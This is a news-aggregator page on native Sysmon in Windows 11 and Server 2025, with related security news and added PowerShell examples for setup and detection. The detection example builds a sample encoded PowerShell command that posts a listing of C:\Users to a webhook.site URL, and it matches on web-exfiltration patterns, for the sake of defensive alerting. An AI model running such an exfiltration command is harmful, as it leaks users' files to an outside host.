
Microsoft integrates Sysmon natively into Windows 11 and Server 2025

1 unique source, 3 articles

Summary


Microsoft has integrated Sysmon (System Monitor) natively into Windows 11 and Windows Server 2025, so it no longer has to be deployed as a standalone Sysinternals download. The built-in version is delivered through Windows Update and managed as an optional feature: it is off by default and must be enabled, either under Settings (Optional Features) or from the command line, before it can be used. Once enabled, it is installed from an elevated prompt with 'sysmon -i' for the default configuration, or with 'sysmon -i <config.xml>' to apply a custom configuration file for more selective monitoring. Sysmon records events such as process creation, network connections and file creation to the Microsoft-Windows-Sysmon/Operational event log, which makes it a staple of threat hunting and diagnostics. Anyone who previously installed Sysmon from Sysinternals should uninstall that copy before enabling the built-in version. Microsoft also plans to publish comprehensive documentation and to add enterprise management features and AI-powered threat detection capabilities next year.
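The rollout described above, as an added example written for this page (it is not code from the article or from Microsoft): enable the built-in feature, retire a Sysinternals copy if one is present, install with a small configuration, and confirm events are being written. It assumes the feature can be discovered as a Windows capability or optional feature whose name contains "Sysmon" (the name is looked up rather than hard-coded), that the built-in binary keeps the Sysinternals command line (-i, -c, -u, -accepteula), and that the configuration schema version is 4.90; none of these are confirmed by the article.

```powershell
# Added example (not from the article or Microsoft). Run from an elevated PowerShell
# session on Windows 11 / Windows Server 2025.
# Assumptions: feature name contains "Sysmon"; built-in binary accepts the
# Sysinternals switches; schema version 4.90 ('sysmon -? config' prints the
# version the installed binary actually expects).
$ErrorActionPreference = 'Stop'

# 1. Is the built-in feature already installed? Check both delivery mechanisms.
$cap  = Get-WindowsCapability -Online | Where-Object { $_.Name -like '*Sysmon*' } | Select-Object -First 1
$feat = Get-WindowsOptionalFeature -Online | Where-Object { $_.FeatureName -like '*Sysmon*' } | Select-Object -First 1
$builtInPresent = ($cap -and $cap.State -eq 'Installed') -or ($feat -and $feat.State -eq 'Enabled')

# 2. A Sysmon/Sysmon64 service that exists while the feature is NOT yet installed
#    is the standalone Sysinternals copy: uninstall it before enabling the feature.
$svc = Get-Service -Name 'Sysmon', 'Sysmon64' -ErrorAction SilentlyContinue | Select-Object -First 1
if ($svc -and -not $builtInPresent) {
    $legacyExe = (Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'").PathName.Trim('"')
    Write-Host "Removing standalone Sysinternals Sysmon: $legacyExe -u force"
    & $legacyExe -accepteula -u force
}

# 3. Enable the built-in feature (it is off by default).
if (-not $builtInPresent) {
    if ($cap)      { Add-WindowsCapability -Online -Name $cap.Name | Out-Null }
    elseif ($feat) { Enable-WindowsOptionalFeature -Online -FeatureName $feat.FeatureName -NoRestart | Out-Null }
    else           { throw 'No Sysmon capability or optional feature found; this build may predate the feature.' }
}

# 4. Minimal configuration: hash images with SHA-256, log every process creation
#    (an empty exclude list logs everything), and log network connections only
#    when the initiating image is a scripting host.
$configPath = Join-Path $env:ProgramData 'sysmon-config.xml'
@'
<Sysmon schemaversion="4.90">
  <HashAlgorithms>sha256</HashAlgorithms>
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="exclude">
        <!-- no exclusions: every Event ID 1 is logged -->
      </ProcessCreate>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <Image condition="end with">\powershell.exe</Image>
        <Image condition="end with">\pwsh.exe</Image>
        <Image condition="end with">\cmd.exe</Image>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
'@ | Set-Content -Path $configPath -Encoding UTF8

# 5. Install the service with that config, or just push the config if it is already running.
$sysmon = (Get-Command sysmon.exe).Source
if (Get-Service -Name 'Sysmon', 'Sysmon64' -ErrorAction SilentlyContinue) {
    & $sysmon -accepteula -c $configPath
} else {
    & $sysmon -accepteula -i $configPath
}

# 6. Verify: spawn one process, then count events per ID in the Sysmon Operational log.
Start-Process -FilePath cmd.exe -ArgumentList '/c ver' -WindowStyle Hidden -Wait
Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -MaxEvents 50 -ErrorAction SilentlyContinue |
    Group-Object Id | Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count | Format-Table -AutoSize
& $sysmon -c   # print the configuration now in effect
```

Step 2 uses the feature state, not the binary path, to decide whether a Sysmon service belongs to the old Sysinternals install; that avoids uninstalling the built-in service on a second run. Step 5 is idempotent for the same reason: once the service exists, the script only reloads the configuration with -c instead of failing on a duplicate -i.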

Timeline

  1. 18.11.2025 19:25 · 3 articles

    Microsoft integrates Sysmon natively into Windows 11 and Server 2025


Similar Happenings

Windows 11 KB5077241 Update Introduces BitLocker Improvements and Sysmon Tool

Microsoft released the KB5077241 optional cumulative update for Windows 11, featuring 29 changes, including BitLocker reliability enhancements, a new network speed test tool, and native System Monitor (Sysmon) functionality. The update also improves taskbar behavior, adds support for WebP images as desktop backgrounds, and introduces Remote Server Administration Tools (RSAT) for Windows 11 Arm64 devices. This preview update allows admins to test new features and improvements before they are generally available. The update is optional and does not include security fixes, focusing instead on quality improvements.

Microsoft Introduces Cloud Rebuild and Point-in-Time Restore for Windows 11

Microsoft has announced two new recovery features for Windows 11: Cloud Rebuild and Point-in-Time Restore (PITR). These tools aim to reduce downtime and simplify system recovery from failures or faulty updates. PITR allows rolling back to a previous system snapshot, including files and applications. Cloud Rebuild enables remote reinstallation of Windows 11 via the cloud. Both features will integrate with Microsoft Intune by the first half of 2026. Additionally, Microsoft is enhancing Quick Machine Recovery (QMR) to improve boot failure resolution without physical access.

Microsoft Enhances Quick Machine Recovery in Windows 11

Microsoft is testing an improved version of Quick Machine Recovery (QMR) in Windows 11, which now runs a single scan to fix booting problems instead of looping. This update is part of Microsoft's ongoing efforts to enhance system recovery capabilities. Additionally, Smart App Control (SAC) can now be toggled on and off without requiring a clean Windows install. QMR allows IT administrators to resolve Windows boot failures remotely, eliminating the need for physical access. The feature was introduced in November 2024 as part of Microsoft's Windows Resiliency Initiative, following a major outage caused by a CrowdStrike Falcon update in July 2024. These changes are currently being tested with Windows Insiders in the Dev and Beta channels.

Critical WSUS RCE Vulnerability Exploited in the Wild

A critical remote code execution (RCE) vulnerability (CVE-2025-59287) in Windows Server Update Services (WSUS) is being actively exploited in the wild. The flaw, a case of deserialization of untrusted data in WSUS, allows attackers to run code with SYSTEM privileges on Windows servers that have the WSUS Server role enabled, and it is considered potentially wormable between WSUS servers, which makes it a significant risk to organizations. Microsoft has released out-of-band patches for all affected Windows Server versions; cybersecurity firms have observed exploitation attempts and publicly available proof-of-concept exploit code. The vulnerability was discovered and reported by security researchers MEOW, f7d8c52bec79e42795cf15888b85cbad, and Markus Wulftange of CODE WHITE GmbH. Sophos reported threat actors exploiting the vulnerability to harvest sensitive data from U.S. organizations across various industries, with at least 50 victims identified; the activity was first detected on October 24, 2025, a day after Microsoft issued the update. Attackers use Base64-encoded PowerShell commands to exfiltrate data to a webhook[.]site endpoint, and Michael Haag of Splunk noted an alternate attack chain in which the Microsoft Management Console binary (mmc.exe) is used to trigger cmd.exe execution. More recently, threat actors have exploited CVE-2025-59287 to distribute ShadowPad, a modular backdoor used by Chinese state-sponsored hacking groups: they used PowerCat, certutil, and curl to obtain a system shell and download the malware, which is launched via DLL side-loading and comes with anti-detection and persistence techniques.

Separately, CISA and NSA, along with international partners, have issued guidance on securing Microsoft Exchange Server instances, including restricting administrative access, implementing multi-factor authentication, and enforcing strict transport security configurations; the agencies advise decommissioning end-of-life on-premises or hybrid Exchange servers after transitioning to Microsoft 365.
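Two of the behaviours reported above, cmd.exe spawned by mmc.exe and an encoded PowerShell command that posts data to webhook[.]site, are visible in Sysmon process-creation events (Event ID 1), which ties this item back to the Sysmon feature this page is about. The following is an added example written for this page, not code from the article, Sophos or Splunk. Image, ParentImage and CommandLine are genuine Event ID 1 fields; the sample records, including the webhook URL path "example-id", are constructed here so the checks run offline.

```powershell
# Added example (not from the article): flag the mmc.exe -> cmd.exe chain and
# encoded PowerShell exfiltration in Sysmon Event ID 1 records.
# Get-SysmonProcessCreate reads the live Sysmon Operational log; the records
# at the bottom are constructed samples, not real telemetry.

function ConvertFrom-EncodedPowerShell {
    # powershell.exe accepts -e, -ec, -enc or -encodedcommand; the argument is Base64 of UTF-16LE text.
    param([string]$CommandLine)
    if ($CommandLine -match '\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # not valid Base64: leave it to the generic "encoded" check
    }
    return $null
}

function Test-SuspiciousProcessCreate {
    # $Record: object with Image, ParentImage and CommandLine (as in Sysmon Event ID 1).
    # Returns the list of reasons the record is suspicious; empty when it looks clean.
    param([Parameter(Mandatory)] $Record)
    $reasons = @()
    $image  = [IO.Path]::GetFileName([string]$Record.Image).ToLowerInvariant()
    $parent = [IO.Path]::GetFileName([string]$Record.ParentImage).ToLowerInvariant()

    if ($image -eq 'cmd.exe' -and $parent -eq 'mmc.exe') {
        $reasons += 'cmd.exe launched by mmc.exe'
    }
    if ($image -in @('powershell.exe', 'pwsh.exe')) {
        $decoded = ConvertFrom-EncodedPowerShell -CommandLine $Record.CommandLine
        if ($decoded) {
            $reasons += 'PowerShell started with an encoded command'
            if ($decoded -match 'webhook\.site|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient') {
                $reasons += "decoded script performs web exfiltration: $decoded"
            }
        }
    }
    return ,$reasons
}

function Get-SysmonProcessCreate {
    # Pull Event ID 1 records from the live log and flatten EventData into one object per event.
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Image       = $data['Image']
                ParentImage = $data['ParentImage']
                CommandLine = $data['CommandLine']
            }
        }
}

# --- Constructed sample records (not real telemetry) --------------------------
$payload = 'Invoke-WebRequest -Uri https://webhook.site/example-id -Method POST -Body (Get-ChildItem C:\Users -Recurse | Out-String)'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows\System32\mmc.exe'; CommandLine = 'cmd.exe /c whoami' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = "powershell.exe -nop -w hidden -enc $encoded" },
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = '"C:\Windows\System32\notepad.exe"' }
)
foreach ($s in $samples) {
    $hits = Test-SuspiciousProcessCreate -Record $s
    if ($hits) { "[ALERT] $($s.Image) <- $($s.ParentImage): $($hits -join '; ')" }
    else       { "[ok]    $($s.Image)" }
}
# Against the live log instead:
#   Get-SysmonProcessCreate | ForEach-Object { $h = Test-SuspiciousProcessCreate -Record $_; if ($h) { $_ | Add-Member Reasons ($h -join '; ') -PassThru } }
```

The first two samples are flagged and the notepad.exe launch is not. Decoding the -EncodedCommand argument is what makes the second rule useful: matching on "webhook.site" in the raw command line would miss it, because the URL only exists inside the Base64 payload.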

Microsoft October 2025 Patch Tuesday fixes 6 zero-days, 183 flaws

Microsoft's October 2025 Patch Tuesday addressed 183 vulnerabilities, including six zero-days, and marked the end of free security updates for Windows 10, whose final cumulative update is **KB5066791**. The release included critical fixes for components such as Windows SMB Server, Microsoft SQL Server, and Remote Access Connection Manager, alongside third-party vulnerabilities in AMD EPYC processors and IGEL OS. Other recent milestones included out-of-band patches for a critical **WSUS vulnerability (CVE-2025-59287)** with public exploit code, smart card authentication issues caused by cryptographic service changes, and a **RasMan zero-day** (a DoS vulnerability) affecting all Windows versions. With Windows 10 at end-of-life, Extended Security Updates (ESU) are available for purchase; Exchange Server 2016/2019 and Skype for Business 2016 also ended support. The October 2025 update is the largest on record, with 183 CVEs pushing Microsoft's annual vulnerability count past 1,021. Separately, the **February 2026 Patch Tuesday** fixed **CVE-2026-20841**, a high-severity remote code execution flaw in **Windows 11 Notepad** that allowed attackers to execute arbitrary programs via malicious Markdown links without a security warning. The flaw, affecting Notepad versions 11.2510 and earlier, stemmed from improper command neutralization that let links launch unverified protocols (e.g. `file://`, `ms-appinstaller://`). Microsoft mitigated it by adding execution warnings for non-HTTP(S) URIs, with the fix distributed automatically via the Microsoft Store.